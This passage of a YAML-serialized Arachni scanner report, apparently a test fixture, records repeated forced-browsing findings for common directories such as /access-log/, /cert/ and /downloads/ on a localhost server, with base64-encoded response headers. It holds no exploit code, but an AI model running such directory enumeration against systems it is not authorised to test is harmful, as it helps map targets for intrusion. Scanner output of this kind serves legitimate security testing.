!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/application/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/application/
injected: application
id: application
elem: path
remarks: {}
method: ''
response: application
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/apps/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/apps/
injected: apps
id: apps
elem: path
remarks: {}
method: ''
response: apps
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/access-log/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/access-log/
injected: access-log
id: access-log
elem: path
remarks: {}
method: ''
response: access-log
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/catalog/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/catalog/
injected: catalog
id: catalog
elem: path
remarks: {}
method: ''
response: catalog
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/cert/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/cert/
injected: cert
id: cert
elem: path
remarks: {}
method: ''
response: cert
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/crypto/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/crypto/
injected: crypto
id: crypto
elem: path
remarks: {}
method: ''
response: crypto
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/classes/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/classes/
injected: classes
id: classes
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: classes
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/cfdocs/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/cfdocs/
injected: cfdocs
id: cfdocs
elem: path
remarks: {}
method: ''
response: cfdocs
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/cdrom/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/cdrom/
injected: cdrom
id: cdrom
elem: path
remarks: {}
method: ''
response: cdrom
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/css/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/css/
injected: css
id: css
elem: path
remarks: {}
method: ''
response: css
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/doc/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/doc/
injected: doc
id: doc
elem: path
remarks: {}
method: ''
response: doc
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/download/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/download/
injected: download
id: download
elem: path
remarks: {}
method: ''
response: download
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/downloads/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/downloads/
injected: downloads
id: downloads
elem: path
remarks: {}
method: ''
response: downloads
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/docs/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/docs/
injected: docs
id: docs
elem: path
remarks: {}
method: ''
response: docs
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/down/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/down/
injected: down
id: down
elem: path
remarks: {}
method: ''
response: down
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
